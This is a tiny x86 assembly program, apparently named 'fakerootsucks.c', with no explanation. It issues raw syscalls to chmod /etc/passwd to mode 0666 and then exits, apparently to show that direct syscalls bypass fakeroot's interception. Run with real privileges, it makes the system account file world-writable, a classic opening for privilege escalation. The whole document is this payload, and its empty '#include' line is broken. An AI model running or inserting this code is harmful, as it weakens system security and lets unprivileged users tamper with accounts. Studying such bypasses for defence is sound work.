#include .file "fakerootsucks.c" .section .rodata etcpasswd: .string "/etc/passwd" .text .align 4 .globl _start .type _start,@function _start: movl $__NR_chmod, %eax movl $etcpasswd, %ebx movl $438, %ecx int $0x80 movl $__NR_exit, %eax movl $0, %ebx int $0x80 .Lfe1: .size _start,.Lfe1-_start